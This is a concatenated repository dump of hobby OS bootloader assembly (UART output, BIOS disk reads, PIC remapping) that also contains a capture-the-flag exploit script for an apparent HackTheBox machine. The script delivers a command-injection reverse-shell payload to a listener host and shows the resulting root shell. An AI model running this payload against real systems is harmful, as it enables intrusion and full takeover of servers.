    subs w21, w21, #1                   // Decrease string length counter
    bne 1b                              // Loop until string length counter = 0
                                        // NOTE(review): this is a do-while loop, so a zero-length
                                        // string is not handled: the byte after the length is still
                                        // printed, w21 wraps to 0xFFFFFFFF and the loop keeps reading
                                        // past the string. A `cbz w21, <exit>` before label 1 fixes it.
    ldp x21, x22, [sp], #16             // Restore used registers
    ldp lr, xzr, [sp], #16              // Restore Link Register (has the return address)
    ret


.global uart_putc
uart_putc:
/******************************************************************************/
/* Waits for UART (PL011) to be ready, then writes one character.             */
/******************************************************************************/
/* w22: The character (byte) to print.                                        */
/*      x23/x24 are saved and restored. The wait is a busy-poll on the TXFF   */
/*      flag with no timeout.                                                 */
/******************************************************************************/
    stp x23, x24, [sp, #-16]!           // Store registers that will be used
    ldr x23, =UART0_FR                  // Load UART Flag Register address into register x23.
1:  ldr w24, [x23]                      // Read Flag Register value into register w24.
    tst w24, #TXFF_BIT                  // Test if "Transmit FIFO Full" bit is set.
    bne 1b                              // If bit is set (UART is not ready), loop.
    ldr x23, =UART0_DR                  // Load UART Data Register address into register x23.
    strb w22, [x23]                     // Send our character byte to the Data Register
    ldp x23, x24, [sp], #16             // Restore used registers
    ret
-------------------------------------------------------------------------------- /os/part1/stage1/disk.asm: --------------------------------------------------------------------------------
BITS 16

;---Initialized data------------------------------------------------------------
disk db 0x80                    ; Drive number handed to INT 13h by Real_mode_read_disk (0x80 = first hard disk).
                                ; NOTE(review): a fixed default - whether the boot drive the BIOS passes
                                ; in DL is ever stored here is not visible in this file.

disk_error_message dw 11        ; Length-prefixed string: 11 bytes follow (presumably the format
                                ; Real_mode_println expects - that routine is not visible here).
                   db 'Disk error!'
DAP:
;*******************************************************************************;
; Disk Address Packet                                                           ;
;-------------------------------------------------------------------------------;
; Offset Size Description                                                       ;
; 0      1    size of packet (16 bytes)                                         ;
; 1      1    always 0                                                          ;
; 2      2    number of sectors to load (max = 127 on some BIOS)                ;
; 4      2    16-bit offset of target buffer                                    ;
; 6      2    16-bit segment of target buffer                                   ;
; 8      4    lower 32 bits of 48-bit starting LBA                              ;
; 12     4    upper 32 bits of 48-bit starting LBA                              ;
;*******************************************************************************;
    db 0x10                     ; size of packet = 16 bytes
    db 0                        ; always 0
.num_sectors:  dw 127           ; number of sectors to load (max = 127 on some BIOS)
.buf_offset:   dw 0x0           ; 16-bit offset of target buffer
.buf_segment:  dw 0x0           ; 16-bit segment of target buffer
.LBA_lower:    dd 0x0           ; lower 32 bits of 48-bit starting LBA
.LBA_upper:    dd 0x0           ; upper 32 bits of 48-bit starting LBA

;---Code------------------------------------------------------------------------
Real_mode_read_disk:
;**********************************************************;
; Load disk sectors to memory (int 13h, function code 42h) ;
;----------------------------------------------------------;
; ax: start sector                                         ;
; cx: number of sectors (512 bytes) to read                ;
; bx: offset of buffer                                     ;
; dx: segment of buffer                                    ;
;----------------------------------------------------------;
; Reads in chunks of at most 127 sectors: the first chunk  ;
; is read through a recursive call, then the LBA and the   ;
; buffer segment are advanced. Halts forever on an error.  ;
; NOTE(review): only ax (16 bits) is stored into           ;
; DAP.LBA_lower, so a start sector >= 65536 is truncated   ;
; even though the loop advances the full eax.              ;
; NOTE(review): bx is reused for every chunk while only    ;
; the segment advances; with bx != 0 a 127-sector chunk    ;
; crosses a 64 KiB boundary, which some BIOSes reject -    ;
; confirm callers pass bx = 0.                             ;
;**********************************************************;
.start:
    cmp cx, 127                 ; (max sectors to read in one call = 127)
    jbe .good_size
    pusha                       ; Read the first 127 sectors with the registers as given...
    mov cx, 127
    call Real_mode_read_disk
    popa                        ; ...then restore them and advance to the next chunk.
    add eax, 127                ; Next start sector.
    add dx, 127 * 512 / 16      ; Advance the buffer segment by 127 sectors (65024 bytes = 4064 paragraphs).
    sub cx, 127                 ; Sectors still to read.
    jmp .start

.good_size:
    mov [DAP.LBA_lower], ax     ; Word store: the upper word of LBA_lower keeps its initial 0.
    mov [DAP.num_sectors], cx
    mov [DAP.buf_segment], dx
    mov [DAP.buf_offset], bx
    mov dl, [disk]              ; Drive number for the BIOS call (the segment argument is already in the DAP).
    mov si, DAP                 ; si -> Disk Address Packet.
    mov ah, 0x42                ; Extended read.
    int 0x13
    jc .print_error             ; CF set = the BIOS reported an error.
    ret
.print_error:
    mov si, disk_error_message
    call Real_mode_println
.halt: hlt
    jmp .halt                   ; Infinite loop. We cannot recover from disk error.
-------------------------------------------------------------------------------- /os/part2/stage2/pic.asm: --------------------------------------------------------------------------------
; PIC (Programmable Interrupt Controller)

BITS 16

;---Constants----------------------------------------------------------------------
PIC1_COMMAND    equ 0x20        ; Command port of 1st PIC
PIC1_DATA       equ 0x21        ; Data port of 1st PIC
PIC2_COMMAND    equ 0xA0        ; Command port of 2nd PIC
PIC2_DATA       equ 0xA1        ; Data port of 2nd PIC
PIC_EOI         equ 0x20        ; EOI (End of interrupt) command (= 0x20)

ICW1_ICW4       equ 0x01        ; Initialization Command Word 4 is needed
ICW1_SINGLE     equ 0x02        ; Single mode (0: Cascade mode)
ICW1_INTERVAL4  equ 0x04        ; Call address interval: 4 (0: 8)
ICW1_LEVEL      equ 0x08        ; Level triggered mode (0: Edge mode)
ICW1_INIT       equ 0x10        ; Initialization - required!

ICW4_8086       equ 0x01        ; 8086/88 mode (0: MCS-80/85 mode)
ICW4_AUTO_EOI   equ 0x02        ; Auto End Of Interrupt (0: Normal EOI)
ICW4_BUF_SLAVE  equ 0x08        ; Buffered mode/slave
ICW4_BUF_MASTER equ 0x0C        ; Buffered mode/master
ICW4_SFNM       equ 0x10        ; Special Fully Nested Mode


;---Code---------------------------------------------------------------------------
Remap_PIC:
;***************************************************************************;
; In protected / long mode, the IRQs 0-15 conflict with the CPU exceptions ;
; (which are reserved up until 0x1F). It is thus recommended to change the ;
; PIC's offsets (remapping the PIC) so that IRQs use non-reserved vectors. ;
; A common choice is to move them to the beginning of the available range: ;
; IRQs 0..15 -> INT 0x20..0x2F (32..47).
For that, we need to set the 1st ;
; PIC's offset to 0x20 (32) and the 2nd's to 0x28 (40).                    ;
; Only al is used and it is preserved (push/pop ax). All 16 IRQ lines are  ;
; left masked on return; the kernel must unmask what it needs once its IDT ;
; is installed.                                                            ;
;***************************************************************************;
    push ax

    ; Disable IRQs
    mov al, 0xFF                ; Out 0xFF to 0xA1 and 0x21 to mask/disable all IRQs.
    out PIC1_DATA, al
    out PIC2_DATA, al
    nop
    nop

    ; Remap PIC
    ; ICW1..ICW4 must be written in this order. There is no io_wait between the
    ; port writes - NOTE(review): confirm this is sufficient on the targeted
    ; hardware / emulator.
    mov al, ICW1_INIT | ICW1_ICW4 ; ICW1: Send initialization command (= 0x11) to both PICs
    out PIC1_COMMAND, al
    out PIC2_COMMAND, al
    mov al, 0x20                ; ICW2: Set vector offset of 1st PIC to 0x20 (i.e. IRQ0 => INT 32)
    out PIC1_DATA, al
    mov al, 0x28                ; ICW2: Set vector offset of 2nd PIC to 0x28 (i.e. IRQ8 => INT 40)
    out PIC2_DATA, al
    mov al, 4                   ; ICW3: tell 1st PIC that there is a 2nd PIC at IRQ2 (= 00000100)
    out PIC1_DATA, al
    mov al, 2                   ; ICW3: tell 2nd PIC its "cascade" identity (= 00000010)
    out PIC2_DATA, al
    mov al, ICW4_8086           ; ICW4: Set mode to 8086/88 mode
    out PIC1_DATA, al
    out PIC2_DATA, al

    mov al, 0xFF                ; OCW1: We mask all interrupts (until we set a proper IDT in Kernel)
    out PIC1_DATA, al
    out PIC2_DATA, al

    pop ax
    ret
-------------------------------------------------------------------------------- /os/part3/stage2/pic.asm: --------------------------------------------------------------------------------
; PIC (Programmable Interrupt Controller)

BITS 16

;---Constants----------------------------------------------------------------------
PIC1_COMMAND    equ 0x20        ; Command port of 1st PIC
PIC1_DATA       equ 0x21        ; Data port of 1st PIC
PIC2_COMMAND    equ 0xA0        ; Command port of 2nd PIC
PIC2_DATA       equ 0xA1        ; Data port of 2nd PIC
PIC_EOI         equ 0x20        ; EOI (End of interrupt) command (= 0x20)

ICW1_ICW4       equ 0x01        ; Initialization Command Word 4 is needed
ICW1_SINGLE     equ 0x02        ; Single mode (0: Cascade mode)
ICW1_INTERVAL4  equ 0x04        ; Call address interval: 4 (0:
8) 15 | ICW1_LEVEL equ 0x08 ; Level triggered mode (0: Edge mode) 16 | ICW1_INIT equ 0x10 ; Initialization - required! 17 | 18 | ICW4_8086 equ 0x01 ; 8086/88 mode (0: MCS-80/85 mode) 19 | ICW4_AUTO_EOI equ 0x02 ; Auto End Of Interrupt (0: Normal EOI) 20 | ICW4_BUF_SLAVE equ 0x08 ; Buffered mode/slave 21 | ICW4_BUF_MASTER equ 0x0C ; Buffered mode/master 22 | ICW4_SFNM equ 0x10 ; Special Fully Nested Mode 23 | 24 | 25 | ;---Code--------------------------------------------------------------------------- 26 | Remap_PIC: 27 | ;***************************************************************************; 28 | ; In protected / long mode, the IRQs 0-15 conflict with the CPU exceptions ; 29 | ; (which are reserved up until 0x1F). It is thus recommended to change the ; 30 | ; PIC's offsets (remapping the PIC) so that IRQs use non-reserved vectors. ; 31 | ; A common choice is to move them to the beginning of the available range: ; 32 | ; IRQs 0..15 -> INT 0x20..0x2F (30..47). For that, we need to set the 1st ; 33 | ; PIC's offset to 0x20 (32) and the 2nd's to 0x28 (40). ; 34 | ;***************************************************************************; 35 | push ax 36 | 37 | ; Disable IRQs 38 | mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to mask/disable all IRQs. 39 | out PIC1_DATA, al 40 | out PIC2_DATA, al 41 | nop 42 | nop 43 | 44 | ; Remap PIC 45 | mov al, ICW1_INIT | ICW1_ICW4 ; ICW1: Send initialization command (= 0x11) to both PICs 46 | out PIC1_COMMAND, al 47 | out PIC2_COMMAND, al 48 | mov al, 0x20 ; ICW2: Set vector offset of 1st PIC to 0x20 (i.e. IRQ0 => INT 32) 49 | out PIC1_DATA, al 50 | mov al, 0x28 ; ICW2: Set vector offset of 2nd PIC to 0x28 (i.e. 
IRQ8 => INT 40) 51 | out PIC2_DATA, al 52 | mov al, 4 ; ICW3: tell 1st PIC that there is a 2nd PIC at IRQ2 (= 00000100) 53 | out PIC1_DATA, al 54 | mov al, 2 ; ICW3: tell 2nd PIC its "cascade" identity (= 00000010) 55 | out PIC2_DATA, al 56 | mov al, ICW4_8086 ; ICW4: Set mode to 8086/88 mode 57 | out PIC1_DATA, al 58 | out PIC2_DATA, al 59 | 60 | mov al, 0xFF ; OCW1: We mask all interrupts (until we set a proper IDT in Kernel) 61 | out PIC1_DATA, al 62 | out PIC2_DATA, al 63 | 64 | pop ax 65 | ret 66 | -------------------------------------------------------------------------------- /os/part4/stage2/pic.asm: -------------------------------------------------------------------------------- 1 | ; PIC (Programmable Interrupt Controller) 2 | 3 | BITS 16 4 | 5 | ;---Constants---------------------------------------------------------------------- 6 | PIC1_COMMAND equ 0x20 ; Command port of 1st PIC 7 | PIC1_DATA equ 0x21 ; Data port of 1st PIC 8 | PIC2_COMMAND equ 0xA0 ; Command port of 2nd PIC 9 | PIC2_DATA equ 0xA1 ; Data port of 2nd PIC 10 | PIC_EOI equ 0x20 ; EOI (End of interrupt) command (= 0x20) 11 | 12 | ICW1_ICW4 equ 0x01 ; Initialization Command Word 4 is needed 13 | ICW1_SINGLE equ 0x02 ; Single mode (0: Cascade mode) 14 | ICW1_INTERVAL4 equ 0x04 ; Call address interval: 4 (0: 8) 15 | ICW1_LEVEL equ 0x08 ; Level triggered mode (0: Edge mode) 16 | ICW1_INIT equ 0x10 ; Initialization - required! 
17 | 18 | ICW4_8086 equ 0x01 ; 8086/88 mode (0: MCS-80/85 mode) 19 | ICW4_AUTO_EOI equ 0x02 ; Auto End Of Interrupt (0: Normal EOI) 20 | ICW4_BUF_SLAVE equ 0x08 ; Buffered mode/slave 21 | ICW4_BUF_MASTER equ 0x0C ; Buffered mode/master 22 | ICW4_SFNM equ 0x10 ; Special Fully Nested Mode 23 | 24 | 25 | ;---Code--------------------------------------------------------------------------- 26 | Remap_PIC: 27 | ;***************************************************************************; 28 | ; In protected / long mode, the IRQs 0-15 conflict with the CPU exceptions ; 29 | ; (which are reserved up until 0x1F). It is thus recommended to change the ; 30 | ; PIC's offsets (remapping the PIC) so that IRQs use non-reserved vectors. ; 31 | ; A common choice is to move them to the beginning of the available range: ; 32 | ; IRQs 0..15 -> INT 0x20..0x2F (30..47). For that, we need to set the 1st ; 33 | ; PIC's offset to 0x20 (32) and the 2nd's to 0x28 (40). ; 34 | ;***************************************************************************; 35 | push ax 36 | 37 | ; Disable IRQs 38 | mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to mask/disable all IRQs. 39 | out PIC1_DATA, al 40 | out PIC2_DATA, al 41 | nop 42 | nop 43 | 44 | ; Remap PIC 45 | mov al, ICW1_INIT | ICW1_ICW4 ; ICW1: Send initialization command (= 0x11) to both PICs 46 | out PIC1_COMMAND, al 47 | out PIC2_COMMAND, al 48 | mov al, 0x20 ; ICW2: Set vector offset of 1st PIC to 0x20 (i.e. IRQ0 => INT 32) 49 | out PIC1_DATA, al 50 | mov al, 0x28 ; ICW2: Set vector offset of 2nd PIC to 0x28 (i.e. 
IRQ8 => INT 40) 51 | out PIC2_DATA, al 52 | mov al, 4 ; ICW3: tell 1st PIC that there is a 2nd PIC at IRQ2 (= 00000100) 53 | out PIC1_DATA, al 54 | mov al, 2 ; ICW3: tell 2nd PIC its "cascade" identity (= 00000010) 55 | out PIC2_DATA, al 56 | mov al, ICW4_8086 ; ICW4: Set mode to 8086/88 mode 57 | out PIC1_DATA, al 58 | out PIC2_DATA, al 59 | 60 | mov al, 0xFF ; OCW1: We mask all interrupts (until we set a proper IDT in Kernel) 61 | out PIC1_DATA, al 62 | out PIC2_DATA, al 63 | 64 | pop ax 65 | ret 66 | -------------------------------------------------------------------------------- /os/part5/stage2/pic.asm: -------------------------------------------------------------------------------- 1 | ; PIC (Programmable Interrupt Controller) 2 | ; Author: Alamot 3 | 4 | BITS 16 5 | 6 | ;---Constants---------------------------------------------------------------------- 7 | PIC1_COMMAND equ 0x20 ; Command port of 1st PIC 8 | PIC1_DATA equ 0x21 ; Data port of 1st PIC 9 | PIC2_COMMAND equ 0xA0 ; Command port of 2nd PIC 10 | PIC2_DATA equ 0xA1 ; Data port of 2nd PIC 11 | PIC_EOI equ 0x20 ; EOI (End of interrupt) command (= 0x20) 12 | 13 | ICW1_ICW4 equ 0x01 ; Initialization Command Word 4 is needed 14 | ICW1_SINGLE equ 0x02 ; Single mode (0: Cascade mode) 15 | ICW1_INTERVAL4 equ 0x04 ; Call address interval: 4 (0: 8) 16 | ICW1_LEVEL equ 0x08 ; Level triggered mode (0: Edge mode) 17 | ICW1_INIT equ 0x10 ; Initialization - required! 
18 | 19 | ICW4_8086 equ 0x01 ; 8086/88 mode (0: MCS-80/85 mode) 20 | ICW4_AUTO_EOI equ 0x02 ; Auto End Of Interrupt (0: Normal EOI) 21 | ICW4_BUF_SLAVE equ 0x08 ; Buffered mode/slave 22 | ICW4_BUF_MASTER equ 0x0C ; Buffered mode/master 23 | ICW4_SFNM equ 0x10 ; Special Fully Nested Mode 24 | 25 | 26 | ;---Code--------------------------------------------------------------------------- 27 | Remap_PIC: 28 | ;***************************************************************************; 29 | ; In protected / long mode, the IRQs 0-15 conflict with the CPU exceptions ; 30 | ; (which are reserved up until 0x1F). It is thus recommended to change the ; 31 | ; PIC's offsets (remapping the PIC) so that IRQs use non-reserved vectors. ; 32 | ; A common choice is to move them to the beginning of the available range: ; 33 | ; IRQs 0..15 -> INT 0x20..0x2F (30..47). For that, we need to set the 1st ; 34 | ; PIC's offset to 0x20 (32) and the 2nd's to 0x28 (40). ; 35 | ;***************************************************************************; 36 | push ax 37 | 38 | ; Disable IRQs 39 | mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to mask/disable all IRQs. 40 | out PIC1_DATA, al 41 | out PIC2_DATA, al 42 | nop 43 | nop 44 | 45 | ; Remap PIC 46 | mov al, ICW1_INIT | ICW1_ICW4 ; ICW1: Send initialization command (= 0x11) to both PICs 47 | out PIC1_COMMAND, al 48 | out PIC2_COMMAND, al 49 | mov al, 0x20 ; ICW2: Set vector offset of 1st PIC to 0x20 (i.e. IRQ0 => INT 32) 50 | out PIC1_DATA, al 51 | mov al, 0x28 ; ICW2: Set vector offset of 2nd PIC to 0x28 (i.e. 
IRQ8 => INT 40) 52 | out PIC2_DATA, al 53 | mov al, 4 ; ICW3: tell 1st PIC that there is a 2nd PIC at IRQ2 (= 00000100) 54 | out PIC1_DATA, al 55 | mov al, 2 ; ICW3: tell 2nd PIC its "cascade" identity (= 00000010) 56 | out PIC2_DATA, al 57 | mov al, ICW4_8086 ; ICW4: Set mode to 8086/88 mode 58 | out PIC1_DATA, al 59 | out PIC2_DATA, al 60 | 61 | mov al, 0xFF ; OCW1: We mask all interrupts (until we set a proper IDT in Kernel) 62 | out PIC1_DATA, al 63 | out PIC2_DATA, al 64 | 65 | pop ax 66 | ret 67 | -------------------------------------------------------------------------------- /hacking/HTB/FluxCapacitor/autopwn_flux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import base64 3 | import signal, thread 4 | import requests, urllib 5 | from pwn import * 6 | signal.signal(signal.SIGINT, signal.SIG_DFL) 7 | 8 | LHOST="10.10.14.43" 9 | LPORT=60001 10 | RHOST="10.10.10.69" 11 | RPORT=80 12 | 13 | PAYLOAD = "/usr/bin/python3 -c \"import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('"+str(LHOST)+"',"+str(LPORT)+"));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();exit();\"" 14 | 15 | class NoEncodingSession(requests.Session): 16 | def send(self, *a, **kw): 17 | # a[0] is prepared request 18 | a[0].url = urllib.unquote(a[0].url) 19 | return requests.Session.send(self, *a, **kw) 20 | 21 | def send_shell_payload(): 22 | encoded_payload = "\\".join(base64.b64encode(PAYLOAD)) 23 | log.info("http://"+str(RHOST)+":"+str(RPORT)+"/sync?opt=' sudo /home/themiddle/.monit cmd "+encoded_payload+"'") 24 | try: 25 | log.info("I am sending the encoded payload for you...") 26 | client = NoEncodingSession() 27 | client.keep_alive = False 28 | url = "http://"+str(RHOST)+":"+str(RPORT)+"/sync" 29 | response = client.get(url, params="opt=' sudo /home/themiddle/.monit cmd "+encoded_payload+"'") 30 | 
print("STATUS CODE: "+str(response.status_code)) 31 | print(response.text) 32 | except requests.exceptions.RequestException as e: 33 | log.failure(str(e)) 34 | finally: 35 | if client: 36 | client.close() 37 | 38 | try: 39 | threading.Thread(target=send_shell_payload).start() 40 | except Exception as e: 41 | log.error(str(e)) 42 | shell = listen(LPORT, timeout=10).wait_for_connection() 43 | if shell.sock is None: 44 | log.failure("Connection timeout.") 45 | sys.exit() 46 | shell.interactive() 47 | sys.exit() 48 | 49 | ''' 50 | $ python2 autopwn_flux.py 51 | [*] http://10.10.10.69:80/sync?opt=' sudo /home/themiddle/.monit cmd L\3\V\z\c\i\9\i\a\W\4\v\c\H\l\0\a\G\9\u\M\y\A\t\Y\y\A\i\a\W\1\w\b\3\J\0\I\G\9\z\L\H\B\0\e\S\x\z\b\2\N\r\Z\X\Q\7\c\z\1\z\b\2\N\r\Z\X\Q\u\c\2\9\j\a\2\V\0\K\H\N\v\Y\2\t\l\d\C\5\B\R\l\9\J\T\k\V\U\L\H\N\v\Y\2\t\l\d\C\5\T\T\0\N\L\X\1\N\U\U\k\V\B\T\S\k\7\c\y\5\j\b\2\5\u\Z\W\N\0\K\C\g\n\M\T\A\u\M\T\A\u\M\T\Q\u\N\D\M\n\L\D\Y\w\M\D\A\x\K\S\k\7\b\3\M\u\Z\H\V\w\M\i\h\z\L\m\Z\p\b\G\V\u\b\y\g\p\L\D\A\p\O\2\9\z\L\m\R\1\c\D\I\o\c\y\5\m\a\W\x\l\b\m\8\o\K\S\w\x\K\T\t\v\c\y\5\k\d\X\A\y\K\H\M\u\Z\m\l\s\Z\W\5\v\K\C\k\s\M\i\k\7\b\3\M\u\c\H\V\0\Z\W\5\2\K\C\d\I\S\V\N\U\R\k\l\M\R\S\c\s\J\y\9\k\Z\X\Y\v\b\n\V\s\b\C\c\p\O\3\B\0\e\S\5\z\c\G\F\3\b\i\h\b\J\y\9\i\a\W\4\v\Y\m\F\z\a\C\c\s\J\y\1\p\J\1\0\p\O\3\M\u\Y\2\x\v\c\2\U\o\K\T\t\l\e\G\l\0\K\C\k\7\I\g\=\=' 52 | [+] Trying to bind to 0.0.0.0 on port 60001: Done 53 | [*] I am sending the encoded payload for you... 
54 | [+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.69 on port 49114 55 | [*] Switching to interactive mode 56 | root@fluxcapacitor:/# $ whoami 57 | whoami 58 | root 59 | root@fluxcapacitor:/# $ 60 | ''' 61 | -------------------------------------------------------------------------------- /os/part2/stage1/disk.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | 5 | disk db 0x80 6 | 7 | disk_error_message dw 11 8 | db 'Disk error!' 9 | 10 | 11 | DAP: 12 | ;*******************************************************************************; 13 | ; Disk Address Packet ; 14 | ;-------------------------------------------------------------------------------; 15 | ; Offset Size Description ; 16 | ; 0 1 size of packet (16 bytes) ; 17 | ; 1 1 always 0 ; 18 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ; 19 | ; 4 2 16-bit offset of target buffer ; 20 | ; 4 2 16-bit segment of target buffer ; 21 | ; 8 4 lower 32 bits of 48-bit starting LBA ; 22 | ; 12 4 upper 32 bits of 48-bit starting LBA ; 23 | ;*******************************************************************************; 24 | db 0x10 ; size of packet = 16 bytes 25 | db 0 ; always 0 26 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS) 27 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer 28 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer 29 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA 30 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA 31 | 32 | 33 | 34 | ;---Code------------------------------------------------------------------------ 35 | 36 | Real_mode_read_disk: 37 | ;**********************************************************; 38 | ; Load disk sectors to memory (int 13h, function code 42h) ; 39 | ;----------------------------------------------------------; 40 | ; ax: start sector ; 
41 | ; cx: number of sectors (512 bytes) to read ; 42 | ; bx: offset of buffer ; 43 | ; dx: segment of buffer ; 44 | ;**********************************************************; 45 | .start: 46 | cmp cx, 127 ; (max sectors to read in one call = 127) 47 | jbe .good_size 48 | pusha 49 | mov cx, 127 50 | call Real_mode_read_disk 51 | popa 52 | add eax, 127 53 | add dx, 127 * 512 / 16 54 | sub cx, 127 55 | jmp .start 56 | 57 | .good_size: 58 | mov [DAP.LBA_lower], ax 59 | mov [DAP.num_sectors], cx 60 | mov [DAP.buf_segment], dx 61 | mov [DAP.buf_offset], bx 62 | mov dl, [disk] 63 | mov si, DAP 64 | mov ah, 0x42 65 | int 0x13 66 | jc .print_error 67 | ret 68 | .print_error: 69 | mov si, disk_error_message 70 | call Real_mode_println 71 | .halt: hlt 72 | jmp .halt; Infinite loop. We cannot recover from disk error. 73 | -------------------------------------------------------------------------------- /os/part3/stage1/disk.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | 5 | disk db 0x80 6 | 7 | disk_error_message dw 11 8 | db 'Disk error!' 
9 | 10 | 11 | DAP: 12 | ;*******************************************************************************; 13 | ; Disk Address Packet ; 14 | ;-------------------------------------------------------------------------------; 15 | ; Offset Size Description ; 16 | ; 0 1 size of packet (16 bytes) ; 17 | ; 1 1 always 0 ; 18 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ; 19 | ; 4 2 16-bit offset of target buffer ; 20 | ; 4 2 16-bit segment of target buffer ; 21 | ; 8 4 lower 32 bits of 48-bit starting LBA ; 22 | ; 12 4 upper 32 bits of 48-bit starting LBA ; 23 | ;*******************************************************************************; 24 | db 0x10 ; size of packet = 16 bytes 25 | db 0 ; always 0 26 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS) 27 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer 28 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer 29 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA 30 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA 31 | 32 | 33 | 34 | ;---Code------------------------------------------------------------------------ 35 | 36 | Real_mode_read_disk: 37 | ;**********************************************************; 38 | ; Load disk sectors to memory (int 13h, function code 42h) ; 39 | ;----------------------------------------------------------; 40 | ; ax: start sector ; 41 | ; cx: number of sectors (512 bytes) to read ; 42 | ; bx: offset of buffer ; 43 | ; dx: segment of buffer ; 44 | ;**********************************************************; 45 | .start: 46 | cmp cx, 127 ; (max sectors to read in one call = 127) 47 | jbe .good_size 48 | pusha 49 | mov cx, 127 50 | call Real_mode_read_disk 51 | popa 52 | add eax, 127 53 | add dx, 127 * 512 / 16 54 | sub cx, 127 55 | jmp .start 56 | 57 | .good_size: 58 | mov [DAP.LBA_lower], ax 59 | mov [DAP.num_sectors], cx 60 | mov [DAP.buf_segment], dx 61 | mov [DAP.buf_offset], bx 62 | mov dl, [disk] 63 | mov si, DAP 64 | 
mov ah, 0x42 65 | int 0x13 66 | jc .print_error 67 | ret 68 | .print_error: 69 | mov si, disk_error_message 70 | call Real_mode_println 71 | .halt: hlt 72 | jmp .halt; Infinite loop. We cannot recover from disk error. 73 | -------------------------------------------------------------------------------- /os/part4/stage1/disk.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | 5 | disk db 0x80 6 | 7 | disk_error_message dw 11 8 | db 'Disk error!' 9 | 10 | 11 | DAP: 12 | ;*******************************************************************************; 13 | ; Disk Address Packet ; 14 | ;-------------------------------------------------------------------------------; 15 | ; Offset Size Description ; 16 | ; 0 1 size of packet (16 bytes) ; 17 | ; 1 1 always 0 ; 18 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ; 19 | ; 4 2 16-bit offset of target buffer ; 20 | ; 4 2 16-bit segment of target buffer ; 21 | ; 8 4 lower 32 bits of 48-bit starting LBA ; 22 | ; 12 4 upper 32 bits of 48-bit starting LBA ; 23 | ;*******************************************************************************; 24 | db 0x10 ; size of packet = 16 bytes 25 | db 0 ; always 0 26 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS) 27 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer 28 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer 29 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA 30 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA 31 | 32 | 33 | 34 | ;---Code------------------------------------------------------------------------ 35 | 36 | Real_mode_read_disk: 37 | ;**********************************************************; 38 | ; Load disk sectors to memory (int 13h, function code 42h) ; 39 | ;----------------------------------------------------------; 40 | ; ax: start sector ; 41 | ; cx: 
number of sectors (512 bytes) to read ; 42 | ; bx: offset of buffer ; 43 | ; dx: segment of buffer ; 44 | ;**********************************************************; 45 | .start: 46 | cmp cx, 127 ; (max sectors to read in one call = 127) 47 | jbe .good_size 48 | pusha 49 | mov cx, 127 50 | call Real_mode_read_disk 51 | popa 52 | add eax, 127 53 | add dx, 127 * 512 / 16 54 | sub cx, 127 55 | jmp .start 56 | 57 | .good_size: 58 | mov [DAP.LBA_lower], ax 59 | mov [DAP.num_sectors], cx 60 | mov [DAP.buf_segment], dx 61 | mov [DAP.buf_offset], bx 62 | mov dl, [disk] 63 | mov si, DAP 64 | mov ah, 0x42 65 | int 0x13 66 | jc .print_error 67 | ret 68 | .print_error: 69 | mov si, disk_error_message 70 | call Real_mode_println 71 | .halt: hlt 72 | jmp .halt; Infinite loop. We cannot recover from disk error. 73 | -------------------------------------------------------------------------------- /os/part5/stage1/disk.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 4 | 5 | ;---Initialized data------------------------------------------------------------ 6 | 7 | disk db 0x80 8 | 9 | disk_error_message dw 11 10 | db 'Disk error!' 
11 | 12 | 13 | DAP: 14 | ;*******************************************************************************; 15 | ; Disk Address Packet ; 16 | ;-------------------------------------------------------------------------------; 17 | ; Offset Size Description ; 18 | ; 0 1 size of packet (16 bytes) ; 19 | ; 1 1 always 0 ; 20 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ; 21 | ; 4 2 16-bit offset of target buffer ; 22 | ; 4 2 16-bit segment of target buffer ; 23 | ; 8 4 lower 32 bits of 48-bit starting LBA ; 24 | ; 12 4 upper 32 bits of 48-bit starting LBA ; 25 | ;*******************************************************************************; 26 | db 0x10 ; size of packet = 16 bytes 27 | db 0 ; always 0 28 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS) 29 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer 30 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer 31 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA 32 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA 33 | 34 | 35 | 36 | ;---Code------------------------------------------------------------------------ 37 | 38 | Real_mode_read_disk: 39 | ;**********************************************************; 40 | ; Load disk sectors to memory (int 13h, function code 42h) ; 41 | ;----------------------------------------------------------; 42 | ; ax: start sector ; 43 | ; cx: number of sectors (512 bytes) to read ; 44 | ; bx: offset of buffer ; 45 | ; dx: segment of buffer ; 46 | ;**********************************************************; 47 | .start: 48 | cmp cx, 